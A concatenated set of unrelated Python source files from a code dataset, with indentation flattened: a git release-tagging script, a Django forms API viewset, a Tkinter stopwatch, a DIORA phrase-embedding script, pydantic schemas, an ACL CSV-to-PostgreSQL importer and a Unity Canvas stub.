'--format="%(taggerdate:raw)|%(refname:strip=2)"')
.strip(' \n')
.replace('"', '')
.split('|'))
if len(first_tag) > 1:
if ((use_annotate and first_tag[0] == '') or
(not use_annotate and first_tag[0] != '')):
retval = not use_annotate
return retval
def main():
global VERBOSE, DRYRUN
p = argparse.ArgumentParser(description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
p.add_argument('-c', '--command', dest='cmd', action='store',
choices=['cherrypick', 'create', 'delete', 'revert'],
help='command to run')
p.add_argument('-r', '--repo', dest='repo', action='store', default='',
help='remote repository URL (e.g., '
'`[email protected]:mozilla/fireplace.git` or '
'`mozilla/fireplace`)', required=True)
p.add_argument('-s', '--sha', dest='sha', action='store',
help='sha1 hash of git commit')
p.add_argument('-t', '--tag', dest='tag', action='store',
help='name of git tag', required=True)
p.add_argument('-v', '--verbose', dest='verbose', action='store',
help='make lots of noise', default=VERBOSE)
p.add_argument('-n', '--dry-run', dest='dryrun', action='store',
help="Show git actions to perform but don't do them", default=DRYRUN)
group = p.add_mutually_exclusive_group(required=False)
group.add_argument('-a', '--annotate', dest='useannotate',
action='store_true')
group.add_argument('-l', '--lightweight', dest='useannotate',
action='store_false')
p.set_defaults(useannotate=True)
args = p.parse_args()
cmd, repo, sha, tag = (args.cmd, args.repo, args.sha, args.tag)
VERBOSE, DRYRUN, use_annotated = (args.verbose, args.dryrun,
args.useannotate)
if tag == 'YYYY.MM.DD':
p.error('tag should be the date of push, not: %s' % tag)
try:
tagdate = datetime.datetime.strptime(tag, '%Y.%m.%d')
if tagdate.weekday() == 4:
p.error('%s is a Friday. Did you really mean %s?'
% (tag, (tagdate + datetime.timedelta(days=4)
).strftime('%Y.%m.%d')))
except ValueError:
# Not parseable as a date, no big deal.
pass
if cmd in ('cherrypick', 'revert') and not sha:
p.error(
'argument -s/--sha is required when cherry-picking a commit')
repos = [get_remote_url(x.strip()) for x in repo.split(',')]
urls = []
for remote_url in repos:
path = get_git_path(remote_url)
team, repo = get_team_repo(remote_url).split('/')
# Check out master.
git(path, 'checkout master')
# Fetch the latest tags and code.
git(path, 'fetch --tags')
git(path, 'pull --rebase')
set_annotate = resolve_annotate(path, use_annotated)
if set_annotate != use_annotated:
if set_annotate:
print 'Convention is to use annotated tags. Conforming...'
else:
print 'Convention is to use lightweight tags. Conforming...'
if cmd == 'create':
git_create_tag(path, tag, set_annotate)
elif cmd == 'cherrypick':
# Check out existing tag.
git(path, 'checkout %s' % tag)
git_delete_tag(path, tag)
# Cherry-pick commit.
git(path, 'cherry-pick %s' % sha)
git_create_tag(path, tag, set_annotate)
elif cmd == 'delete':
git_delete_tag(path, tag)
elif cmd == 'revert':
# Check out existing tag.
git(path, 'checkout %s' % tag)
git_delete_tag(path, tag)
# Revert commit.
git(path, 'revert %s' % sha)
git_create_tag(path, tag, set_annotate)
# Identify the latest two tags.
# This will only work if a repo:
# a) contains strictly lightweight OR annotated tags
# b) has a defined tag syntax, e.g. /YYYY\.MM\.DD(-\d)?/
# c) only tags in linear sequence
# Because lightweight tags point to commits and annotated
# tags are explicit objects, you can't rely on dereferencing
# fields between the two for comparisons.
# Meaning, something like this:
# git for-each-ref --format='%(*committerdate:raw)%(committerdate:raw) %(refname) \
# %(*objectname) %(objectname)' refs/tags | sort -n -r | awk '{ print $3; }' | head -2
# won't work because the %(committerdate) field is unreliable
# as a timeline sequence between lightweight and annotated tags.
# Which is why "latest" tags assume that tags are not
# applied to points in a branch prior to another tag.
# Be internally consistent:
formatstring = 'for-each-ref refs/tags --format="%(refname:strip=2)" --count=2 '
if set_annotate:
formatstring += '--sort=-refname --sort=-*committerdate'
else:
formatstring += '--sort=-refname --sort=-committerdate'
prev_tags = (git(path, formatstring)
.strip(' \n')
.replace('"', '')
.replace("'", '')
.split('\n'))
if not DRYRUN:
if len(prev_tags) == 1:
prev_tags.append('master')
# Get the URL of the tag comparison page.
urls.append(get_github_url(
team, repo, '/compare/{previous_tag}...{latest_tag}'.format(
previous_tag=prev_tags[1],
latest_tag=prev_tags[0]
)
))
if urls:
urls = '\n'.join(urls)
print urls
pbcopy(urls)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
1650740
|
from __future__ import unicode_literals
from rest_framework import serializers
from rest_framework.response import Response
from rest_framework.decorators import detail_route
from django.db.models import Q
from onadata.apps.fieldsight.models import Site
# from onadata.apps.main.models.meta_data import MetaData
from onadata.apps.api.viewsets.xform_list_api import XFormListApi
from onadata.apps.fsforms.models import FieldSightXF
from onadata.apps.fsforms.serializers.FieldSightXFormSerializer import FSXFormListSerializer
from onadata.apps.fsforms.serializers.FieldSightXformManifestSerializer import FSXFormManifestSerializer
class AssignedXFormListApi(XFormListApi):
serializer_class = FSXFormListSerializer
queryset = FieldSightXF.objects.all()
template_name = 'fsforms/assignedFormList.xml'
def filter_queryset(self, queryset):
if self.request.user.is_anonymous():
self.permission_denied(self.request)
site_id = self.kwargs.get('site_id', None)
queryset = queryset.filter(site__id=site_id, site__isnull=False, is_deployed=True)
return queryset
@detail_route(methods=['GET'])
def manifest(self, request, *args, **kwargs):
if kwargs.get('site_id') == '0':
self.object = FieldSightXF.objects.get(pk=kwargs.get('pk'))
else:
self.object = self.get_object()
object_list = []
context = self.get_serializer_context()
serializer = FSXFormManifestSerializer(object_list, many=True,
context=context)
return Response(serializer.data, headers=self.get_openrosa_headers())
def list(self, request, *args, **kwargs):
self.object_list = self.filter_queryset(self.get_queryset())
serializer = self.get_serializer(self.object_list, many=True)
return Response(serializer.data, headers=self.get_openrosa_headers())
def project_forms(self, request, *args, **kwargs):
self.object_list = self.queryset.filter(Q(project__id=kwargs.get('project_id'), site__isnull=True,
is_deleted=False, is_deployed=True) |
Q(project__id=kwargs.get('project_id'), site__isnull=True,
is_survey=True, is_deleted=False, is_deployed=True))
serializer = self.get_serializer(self.object_list, many=True)
return Response(serializer.data, headers=self.get_openrosa_headers())
def site_overide_forms(self, request, *args, **kwargs):
self.object_list = self.queryset.filter(Q(site__project_id=kwargs.get('project_id'),
fsform__isnull=True, project__isnull=True,
is_deployed=True, is_deleted=False) |
Q(site__project_id=kwargs.get('project_id'),
from_project=False, is_deployed=True, is_deleted=False))
serializer = self.get_serializer(self.object_list, many=True)
return Response(serializer.data, headers=self.get_openrosa_headers())
|
StarcoderdataPython
|
3212413
|
#!/usr/bin/env python
# Author: cptx032
# Mail-me: <EMAIL>
from Tkinter import *
top = Tk()
SEC = 0
HOUR = 0
MIN = 0
PAUSED = True
MINIMIZED = False
top.withdraw()
top.config(bg="#333")
top.overrideredirect(1)
top.attributes("-alpha",0.9, "-topmost",1)
top.geometry("%dx%d+%d+0" % (200, top.winfo_screenheight(), top.winfo_screenwidth()-200))
top.deiconify()
top.focus_force()
la = Label(top, font=("TkDefaultFont",18),text="test",justify=RIGHT,fg="white",bg="#333")
la.pack(pady=5, padx=5,anchor=E, expand=YES,fill=Y)
top.bind("<Escape>", lambda e:top.destroy(), "+")
def _update_time(*args):
top.after(1000, _update_time)
if not PAUSED:
return
global HOUR, MIN, SEC
SEC += 1
if SEC == 60:
SEC = 0
MIN += 1
if MIN == 60:
HOUR += 1
MIN = 0
la["text"] = ":chrom\n%02d:%02d:%02d" % (HOUR, MIN, SEC)
_update_time()
def _fix_win_bar_problem(*arg):
top.after(1, _fix_win_bar_problem)
top.attributes("-topmost",1)
_fix_win_bar_problem()
def _handler_pause(*args):
global PAUSED
PAUSED = not PAUSED
top.bind("<1>", _handler_pause, "+")
def _handler_clear(*args):
global HOUR, MIN, SEC
HOUR, MIN, SEC = 0,0,0
la["text"] = ":chrom\n00:00:00"
top.bind("<3>", _handler_clear, "+")
def _handler_quit(*args):
top.destroy()
# top.bind("<2>", _handler_quit, "+")
def _handler_minimize(*args):
global MINIMIZED
if not MINIMIZED:
MINIMIZED = True
top.geometry("%dx%d+%d+0" % (20, top.winfo_screenheight(), top.winfo_screenwidth()-20))
else:
MINIMIZED = False
top.geometry("%dx%d+%d+0" % (200, top.winfo_screenheight(), top.winfo_screenwidth()-200))
top.bind("<MouseWheel>", _handler_minimize, "+")
def _h_focus_in(*args):
top["bg"] = "#333"
la["bg"] = "#333"
#top.bind("<FocusIn>", _h_focus_in, "+")
def _h_focus_out(*args):
top["bg"] = "#ddd"
la["bg"] = "#ddd"
#top.bind("<FocusOut>", _h_focus_out, "+")
top.mainloop()
|
StarcoderdataPython
|
3227915
|
"""
A script to embed every phrase in a dataset as a dense vector, then
to find the top-k neighbors of each phrase according to cosine
similarity.
1. Install missing dependencies.
# More details: https://github.com/facebookresearch/faiss/blob/master/INSTALL.md
conda install faiss-cpu -c pytorch
2. Prepare data. For example, the chunking dataset from CoNLL 2000.
wget https://www.clips.uantwerpen.be/conll2000/chunking/train.txt.gz
gunzip train.txt.gz
python diora/misc/convert_conll_to_jsonl.py --path train.txt > conll-train.jsonl
3. Run this script.
python diora/scripts/phrase_embed.py \
--batch_size 10 \
--emb w2v \
--embeddings_path ~/data/glove.6B/glove.6B.50d.txt \
--hidden_dim 50 \
--log_every_batch 100 \
--save_after 1000 \
--data_type conll_jsonl \
--validation_path ./conll-train.jsonl \
--validation_filter_length 10
Can control the number of neighbors to show with the `--k_top` flag.
Can control the number of candidates to consider with `--k_candidates` flag.
"""
import json
import types
import itertools
import torch
import numpy as np
from train import argument_parser, parse_args, configure
from train import get_validation_dataset, get_validation_iterator
from train import build_net
from diora.logging.configuration import get_logger
try:
import faiss
from faiss import normalize_L2
except ImportError:
print('Could not import `faiss`, which is used to find nearest neighbors.')
def get_cell_index(entity_labels, i_label=0, i_pos=1, i_size=2):
def helper():
for i, lst in enumerate(entity_labels):
for el in lst:
if el is None:
continue
pos = el[i_pos]
size = el[i_size]
label = el[i_label]
yield (i, pos, size, label)
lst = list(helper())
if len(lst) == 0:
return None, []
batch_index = [x[0] for x in lst]
positions = [x[1] for x in lst]
sizes = [x[2] for x in lst]
labels = [x[3] for x in lst]
return batch_index, positions, sizes, labels
def get_many_cells(diora, chart, batch_index, positions, sizes):
cells = []
length = diora.length
idx = []
for bi, pos, size in zip(batch_index, positions, sizes):
level = size - 1
offset = diora.index.get_offset(length)[level]
absolute_pos = offset + pos
idx.append(absolute_pos)
cells = chart[batch_index, idx]
return cells
def get_many_phrases(batch, batch_index, positions, sizes):
batch = batch.tolist()
lst = []
for bi, pos, size in zip(batch_index, positions, sizes):
phrase = tuple(batch[bi][pos:pos+size])
lst.append(phrase)
return lst
class BatchRecorder(object):
def __init__(self, dtype={}):
super(BatchRecorder, self).__init__()
self.cache = {}
self.dtype = dtype
self.dtype2flatten = {
'list': self._flatten_list,
'np': self._flatten_np,
'torch': self._flatten_torch,
}
def _flatten_list(self, v):
return list(itertools.chain(*v))
def _flatten_np(self, v):
return np.concatenate(v, axis=0)
def _flatten_torch(self, v):
return torch.cat(v, 0).cpu().data.numpy()
def get_flattened_result(self):
def helper():
for k, v in self.cache.items():
flatten = self.dtype2flatten[self.dtype.get(k, 'list')]
yield k, flatten(v)
return {k: v for k, v in helper()}
def record(self, **kwargs):
for k, v in kwargs.items():
self.cache.setdefault(k, []).append(v)
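# Illustrative usage (comment only, added for clarity): values recorded under a
# 'list' dtype are flattened with itertools.chain, e.g.
#   rec = BatchRecorder(dtype={'sizes': 'list'})
#   rec.record(sizes=[2, 3]); rec.record(sizes=[4])
#   rec.get_flattened_result()['sizes']  ->  [2, 3, 4]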
class Index(object):
def __init__(self, dim=None):
super(Index, self).__init__()
self.D, self.I = None, None
self.index = faiss.IndexFlatIP(dim)
def add(self, vecs):
self.index.add(vecs)
def cache(self, vecs, k):
self.D, self.I = self.index.search(vecs, k)
def topk(self, q, k):
for j in range(k):
idx = self.I[q][j]
dist = self.D[q][j]
yield idx, dist
class NearestNeighborsLookup(object):
def __init__(self):
super(NearestNeighborsLookup, self).__init__()
def run(options):
logger = get_logger()
validation_dataset = get_validation_dataset(options)
validation_iterator = get_validation_iterator(options, validation_dataset)
word2idx = validation_dataset['word2idx']
embeddings = validation_dataset['embeddings']
idx2word = {v: k for k, v in word2idx.items()}
logger.info('Initializing model.')
trainer = build_net(options, embeddings, validation_iterator)
diora = trainer.net.diora
# 1. Get all relevant phrase vectors.
dtype = {
'example_ids': 'list',
'labels': 'list',
'positions': 'list',
'sizes': 'list',
'phrases': 'list',
'inside': 'torch',
'outside': 'torch',
}
batch_recorder = BatchRecorder(dtype=dtype)
## Eval mode.
trainer.net.eval()
batches = validation_iterator.get_iterator(random_seed=options.seed)
logger.info('Beginning to embed phrases.')
with torch.no_grad():
for i, batch_map in enumerate(batches):
sentences = batch_map['sentences']
batch_size = sentences.shape[0]
length = sentences.shape[1]
# Skips very short examples.
if length <= 2:
continue
_ = trainer.step(batch_map, train=False, compute_loss=False)
entity_labels = batch_map['entity_labels']
batch_index, positions, sizes, labels = get_cell_index(entity_labels)
# Skip short phrases.
batch_index = [x for x, y in zip(batch_index, sizes) if y >= 2]
positions = [x for x, y in zip(positions, sizes) if y >= 2]
labels = [x for x, y in zip(labels, sizes) if y >= 2]
sizes = [y for y in sizes if y >= 2]
cell_index = (batch_index, positions, sizes)
batch_result = {}
batch_result['example_ids'] = [batch_map['example_ids'][idx] for idx in cell_index[0]]
batch_result['labels'] = labels
batch_result['positions'] = cell_index[1]
batch_result['sizes'] = cell_index[2]
batch_result['phrases'] = get_many_phrases(sentences, *cell_index)
batch_result['inside'] = get_many_cells(diora, diora.inside_h, *cell_index)
batch_result['outside'] = get_many_cells(diora, diora.outside_h, *cell_index)
batch_recorder.record(**batch_result)
result = batch_recorder.get_flattened_result()
# 2. Build an index of nearest neighbors.
vectors = np.concatenate([result['inside'], result['outside']], axis=1)
normalize_L2(vectors)
index = Index(dim=vectors.shape[1])
index.add(vectors)
index.cache(vectors, options.k_candidates)
# 3. Print a summary.
example_ids = result['example_ids']
phrases = result['phrases']
assert len(example_ids) == len(phrases)
assert len(example_ids) == vectors.shape[0]
def stringify(phrase):
return ' '.join([idx2word[idx] for idx in phrase])
for i in range(vectors.shape[0]):
topk = []
for j, score in index.topk(i, options.k_candidates):
# Skip same example.
if example_ids[i] == example_ids[j]:
continue
# Skip string match.
if phrases[i] == phrases[j]:
continue
topk.append((j, score))
if len(topk) == options.k_top:
break
assert len(topk) == options.k_top, 'Did not find enough valid candidates.'
# Print.
print('[query] example_id={} phrase={}'.format(
example_ids[i], stringify(phrases[i])))
for rank, (j, score) in enumerate(topk):
print('rank={} score={:.3f} example_id={} phrase={}'.format(
rank, score, example_ids[j], stringify(phrases[j])))
if __name__ == '__main__':
parser = argument_parser()
parser.add_argument('--k_candidates', default=100, type=int)
parser.add_argument('--k_top', default=3, type=int)
options = parse_args(parser)
configure(options)
run(options)
|
StarcoderdataPython
|
1601582
|
<filename>app/schemas.py
from typing import List
from pydantic import BaseModel
# orm_mode tells the Pydantic model to read the data even if it
# is not a dict, but an ORM model (or any other arbitrary object with attributes).
class MarketBase(BaseModel):
id: int
market_name: str
country_code: str
market_id: str
class Market(MarketBase):
id: int
market_id: str
market_name: str
country_code: str
class Config:
orm_mode = True
class QCWholesaleBase(BaseModel):
market_name: str
product: str
source: str
start: str
end: str
timeliness: str
data_length: str
completeness: str
duplicates: str
mode_D: str
class QCWholesale(QCWholesaleBase):
market_name: str
product: str
source: str
start: str
end: str
timeliness: str
data_length: str
completeness: str
duplicates: str
mode_D: str
class Config:
orm_mode = True
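# Illustrative sketch (not part of the original app): with Config.orm_mode = True,
# a Market can be built from any attribute-based object such as a SQLAlchemy row.
# `_FakeRow` is a stand-in object invented purely for this example.
if __name__ == "__main__":
    class _FakeRow:
        id = 1
        market_id = "MKT-1"
        market_name = "Central Market"
        country_code = "KE"

    print(Market.from_orm(_FakeRow()))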
|
StarcoderdataPython
|
48703
|
## ACL Import Module
# ACL CSV Import
# Version 5
# 2015-10-30
# we only need the datetime class & the static function strptime from datetime module
from datetime import datetime
import re
import sys
import os
import logging
# best postgresql module so far, install it "yum install python-psycopg2"
import psycopg2
import csv
import shutil
from tempfile import mkstemp
module_logger = logging.getLogger('acl')
_sql={
'schd' : """
insert into acl_schd
(
source,
acl_id,
flight_id,
carrier_id,
leg_id,
airline_iata,
airline_icao,
flightnumber,
codeshare,
operating_flightnumber,
flight_date,
std,
"off",
"out",
down,
"on",
sta,
eta,
ata,
origin_iata,
origin_icao,
destination_iata,
destination_icao,
airport_iata,
airport_icao,
last_next_iata,
last_next_icao,
orig_dest_iata,
orig_dest_icao,
aircraft_iata,
aircraft_icao,
seats,
pax,
lastupdated,
flight_type,
pax_flight,
origin_status,
destination_status,
etd,
atd,
arr_dep,
oag_type,
flight_transid,
voyageid
)
select
source,
acl_id as acl_id,
null as flight_id,
null as carrier_id,
null as leg_id,
airline_iata,
airline_icao,
acl_flightnumber as flightnumber,
0 as codeshare,
null as operating_flightnumber,
acl_date as flight_date,
(case when acl_arrdep = 'D' then flight_datetime end) as std,
null as off,
null as out,
null as down,
null as on,
(case when acl_arrdep = 'A' then flight_datetime end) as sta,
null as eta,
null as ata,
acl_origin as origin_iata,
acl_origin_icao as origin_icao,
acl_dest as destination_iata,
acl_dest_icao as destination_icao,
acl_airport as airport_iata,
airport_icao as airport_icao,
acl_last_next_iata as last_next_iata,
acl_last_next_icao as last_next_icao,
acl_orig_dest_iata as orig_dest_iata,
acl_orig_dest_icao as orig_dest_icao,
acl_aircraft_iata as aircraft_iata,
acl_aircraft_icao as aircraft_icao,
null as seats,
null as pax,
lastupdated at time zone 'UTC' as lastupdated,
acl_service_type as flight_type,
servicetype_pax::int as pax_flight,
null as origin_status,
null as destination_status,
null as etd,
null as atd,
acl_arrdep as arr_dep,
null as oag_type,
null as flight_transid,
( acl_origin || acl_dest || to_char(acl_date,'YYYYMMDD') || btrim(coalesce(airline_iata,airline_icao)) || btrim(acl_flightnumber) || acl_arrdep) as voyageid
from (
select
A.acl_id,
A.acl_file_date,
A.acl_date,
A.acl_time,
A.acl_arrdep,
A.acl_airport,
A.acl_last_next_iata,
A.acl_orig_dest_iata,
A.acl_aircraft_iata,
A.acl_last_next_icao,
A.acl_orig_dest_icao,
A.acl_aircraft_icao,
A.acl_operator_airline_code,
A.acl_flightnumber,
A.acl_service_type,
A.acl_aircraft_reg,
A.acl_edit_date,
OFA.airline_iata,
OFA.airline_icao,
OF1.airport_icao,
-- calculated fields
A.acl_date + A.acl_time at time zone 'UTC' as flight_datetime,
--A.acl_date + A.acl_time as flight_datetime,
(case when A.acl_arrdep = 'D' then A.acl_airport else A.acl_last_next_iata end) as acl_origin,
(case when A.acl_arrdep = 'A' then A.acl_airport else A.acl_last_next_iata end) as acl_dest,
(case when A.acl_arrdep = 'D' then OF1.airport_icao else A.acl_last_next_icao end) as acl_origin_icao,
(case when A.acl_arrdep = 'A' then OF1.airport_icao else A.acl_last_next_icao end) as acl_dest_icao,
T.servicetype_pax,
source_type as source,
source_date as lastupdated
from acl_csv A
join history H
on H.source_type='A'
join of_airlines OFA
on ( OFA.airline_iata = A.acl_operator_airline_code and OFA.airline_active='Y' )
or OFA.airline_icao = A.acl_operator_airline_code
left join of_airports OF1
on OF1.airport_iata = A.acl_airport
left join servicetypes T
on acl_service_type = servicetype_code
where acl_file_type = 3
and acl_file_date > coalesce(
(
select
A.acl_file_date
from acl_csv A
join (
select
max(acl_id) as acl_id,
max(lastupdated) as lastupdated
from (
select
max(acl_id) as acl_id,
max(lastupdated) as lastupdated
from schd
where source='A'
group by lastupdated
UNION
select
max(acl_id) as acl_id,
max(lastupdated) as lastupdated
from acl_schd
where source='A'
group by lastupdated
) Z
) B
on B.acl_id = A.acl_id
), '2015-01-01'::date)
-- and acl_file_date >= '2015-09-14'::date
and acl_date > acl_file_date -- because acl data turns up nearly 24 hours late
) Z
""",
'copy' : """
copy acl_csv (
acl_aircraft_iata,
acl_aircraft_reg,
acl_airport,
acl_arrdep,
acl_created_date,
acl_date,
acl_doop,
acl_edit_date,
acl_aircraft_icao,
acl_last_next_icao,
acl_orig_dest_icao,
acl_last_next_iata,
acl_last_next_country,
acl_operator_airline_code,
acl_operator_group_name,
acl_operator_name,
acl_orig_dest_iata,
acl_orig_dest_country,
acl_terminal_name,
acl_season,
acl_seats,
acl_flightnumber,
acl_service_type,
acl_turnaround,
acl_terminal,
acl_time,
acl_turn_operator_airline_code,
acl_turn_flightnumber,
acl_flightdesignator,
acl_loadfactor
) from stdin
with csv header
""",
'history' : """
update history
set source_date = now()
where source_type='A'
""",
'update' : """
update acl_csv
set acl_filename = %s,
acl_file_date = %s,
acl_file_type = %s
where acl_filename is null
""",
'last' : """
select
extract(epoch from source_date) as lastupdated
from history
where source_type='A'
""",
'file_check' : """
select
acl_filename
from acl_csv
where acl_filename = %(filename)s
""",
'lock_acl_schd' : """
LOCK TABLE acl_schd IN ACCESS EXCLUSIVE MODE
"""
}
# import an ACL CSV file
# Args:
# dbh = database handle (psycopg2)
# filename = csv filename
def importfile(dbh, filename):
module_logger.info("Import %s", filename)
status=1
message='OK'
if os.path.isfile(filename):
# break the file name into useful parts
# optional airport & season prefix which we ignore, e.g. "LHRS15"
# mandatory "HOMEOFFICEROLL"
# mandatory integer filetype usually 1 or 3 or 180
# mandatory file date in YYYYMMDD
# note case insensitive as we have been given files with both uppercase and lowercase filenames
match = re.search('^(.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})\.csv$', os.path.basename(filename), re.I)
if match is not None:
date = datetime.strptime(match.group(3), '%Y%m%d').date()
filetype= match.group(2)
module_logger.info("Importing %s", filename)
module_logger.debug("Processing File %s Date %s File Type %s Filename %s", filename, date, filetype, os.path.basename(filename))
# copy data using the PostgreSQL COPY command; psycopg2 lets us do so from a python file handle via "stdin"
csr=dbh.cursor()
try:
f=open(filename)
csr.copy_expert(sql=_sql['copy'], file=f)
# add file info to the rows we just imported
csr.execute(_sql['update'], (os.path.basename(filename), date, filetype))
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
csr.execute(_sql['history'])
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
# gain an AccessExclusive lock on the acl_schd table to prevent race condition with schd.py
csr.execute(_sql['lock_acl_schd'])
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
csr.execute(_sql['schd'])
module_logger.debug("Q %s", csr.query)
module_logger.debug("R %s", csr.statusmessage)
csr.close()
module_logger.debug("Commit")
dbh.commit()
status=1
except:
module_logger.exception("Rollback")
csr.close()
dbh.rollback()
status=-2
message="Error processing "+filename
module_logger.error("Error processing %s", filename)
finally:
f.close()
else:
status=-2
message="Invalid filename skipping "+filename
module_logger.warning("File name doesn't match %s", filename)
else:
status=-2
message="File not found"+filename
module_logger.error("File not found %s", filename)
return status,message
# end def importfile
def _sortkey(filename):
match = re.search('^(.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})(.*?)$', filename, re.I)
key=''
if match is not None:
key=match.group(3)
return key
#end def _sortkey
def validate_file(f , renamebad=True, baddir=None):
#logger=logging.getLogger()
if baddir is not None:
if not os.path.exists(baddir):
os.makedirs(baddir)
module_logger.info("Validating %s", f)
ok=True
header=False
rewritten=False
header_row=0
rowcount=0
tf=None
with open(f, 'rb') as file:
reader = csv.reader(file)
for row in reader:
if not header:
if len(row) == 30 and row[0] == 'A/C':
header=True
else:
header_row+=1
else:
if len(row) != 30:
ok=False
module_logger.info("Incorrect Row Size %s", rowcount)
rowcount+=1
# end for
if not header:
ok=False
module_logger.info("No Header found")
if header and header_row > 0:
module_logger.info("Extra Header Rows found")
fh, tf = mkstemp()
file.seek(0)
reader = csv.reader(file)
with open(tf, 'wb') as tmpfile:
writer = csv.writer(tmpfile)
r=0
for row in reader:
if r >= header_row:
writer.writerow(row)
r+=1
module_logger.info("Rewrite file")
rewritten=True
if ok and rewritten and tf is not None:
nf=None
if renamebad:
nf=f+'.bad'
os.rename(f,nf)
else:
nf=os.path.join(baddir, os.path.basename(f))
os.rename(f,nf)
os.rename(tf,f)
module_logger.info("Corrected %s Moved Bad File to %s", f, nf)
if not ok:
nf=None
if renamebad:
nf=f+'.bad'
os.rename(f,nf)
else:
nf=os.path.join(baddir, os.path.basename(f))
os.rename(f,nf)
module_logger.info("Moved Bad File %s to %s", f, nf)
return ok
#end def validate_file
def import_folder(dbh, sourcedir, archivedir=None, debug=False):
status=1
message='OK'
archivemode=False
if archivedir is not None and archivedir != sourcedir:
archivemode=True
if not os.path.exists(archivedir):
os.makedirs(archivedir)
#retrieve last imported file date/time
csr=dbh.cursor()
filecount=0
if os.path.isdir(sourcedir):
filelist=sorted(os.listdir(sourcedir), key = _sortkey)
if filelist is not None:
for filename in filelist:
f=os.path.join(sourcedir, filename)
if os.path.isfile(f):
# is it a .done file?
match = re.search('^((.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})\.csv)\.done$', filename, re.I)
if match is not None:
# extract corresponding csv name & check it
csvfilename=match.group(1)
cf=os.path.join(sourcedir, csvfilename)
if os.path.isfile(cf) and validate_file(cf, False, archivedir):
csr.execute(_sql['file_check'], { 'filename': csvfilename } )
# if the filename isn't found
if csr.rowcount == 0:
module_logger.debug("F %s",cf)
module_logger.info("Importing %s", cf)
status, message=importfile(dbh, cf)
if status != 1:
module_logger.debug("Status %s bailing", status)
break
filecount+=1
# only archive if status is good & archivedir
if archivemode:
nf=os.path.join(archivedir, csvfilename)
os.rename(cf,nf)
# remove the .done file
os.unlink(f)
#end for
if filecount == 0:
module_logger.error("No files imported")
message='No files imported'
else:
module_logger.info("%s files imported", filecount)
message="%s files imported" % filecount
else:
module_logger.error("No files found")
status=-2
message='No files found to import'
else:
status=-2
module_logger.error("%s not a folder", sourcedir)
message="Source Folder not found "+sourcedir
csr.close()
return status, message
# end def findfiles
|
StarcoderdataPython
|
170911
|
from typing import overload
from UdonPie import System
from UdonPie import UnityEngine
from UdonPie.Undefined import *
class Canvas:
def __new__(cls, arg1=None):
'''
:returns: Canvas
:rtype: UnityEngine.Canvas
'''
pass
@staticmethod
def op_Implicit(arg1):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Equality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def op_Inequality(arg1, arg2):
'''
:param arg1: Object
:type arg1: UnityEngine.Object
:param arg2: Object
:type arg2: UnityEngine.Object
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def add_willRenderCanvases(arg1):
'''
:param arg1: WillRenderCanvases
:type arg1: UnityEngine.WillRenderCanvases
'''
pass
@staticmethod
def remove_willRenderCanvases(arg1):
'''
:param arg1: WillRenderCanvases
:type arg1: UnityEngine.WillRenderCanvases
'''
pass
@staticmethod
def get_isRootCanvas():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def get_pixelRect():
'''
:returns: Rect
:rtype: UnityEngine.Rect
'''
pass
@staticmethod
def get_scaleFactor():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_scaleFactor(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def get_referencePixelsPerUnit():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_referencePixelsPerUnit(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def get_overridePixelPerfect():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_overridePixelPerfect(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_pixelPerfect():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_pixelPerfect(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_planeDistance():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_planeDistance(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def get_renderOrder():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def get_overrideSorting():
'''
:returns: Boolean
:rtype: System.Boolean
'''
pass
@staticmethod
def set_overrideSorting(arg1):
'''
:param arg1: Boolean
:type arg1: System.Boolean or bool
'''
pass
@staticmethod
def get_sortingOrder():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def set_sortingOrder(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
'''
pass
@staticmethod
def get_sortingLayerID():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def set_sortingLayerID(arg1):
'''
:param arg1: Int32
:type arg1: System.Int32 or int
'''
pass
@staticmethod
def get_cachedSortingLayerValue():
'''
:returns: Int32
:rtype: System.Int32
'''
pass
@staticmethod
def get_additionalShaderChannels():
'''
:returns: AdditionalCanvasShaderChannels
:rtype: UnityEngine.AdditionalCanvasShaderChannels
'''
pass
@staticmethod
def set_additionalShaderChannels(arg1):
'''
:param arg1: AdditionalCanvasShaderChannels
:type arg1: UnityEngine.AdditionalCanvasShaderChannels
'''
pass
@staticmethod
def get_sortingLayerName():
'''
:returns: String
:rtype: System.String
'''
pass
@staticmethod
def set_sortingLayerName(arg1):
'''
:param arg1: String
:type arg1: System.String or str
'''
pass
@staticmethod
def get_rootCanvas():
'''
:returns: Canvas
:rtype: UnityEngine.Canvas
'''
pass
@staticmethod
def get_normalizedSortingGridSize():
'''
:returns: Single
:rtype: System.Single
'''
pass
@staticmethod
def set_normalizedSortingGridSize(arg1):
'''
:param arg1: Single
:type arg1: System.Single or float
'''
pass
@staticmethod
def GetDefaultCanvasMaterial():
'''
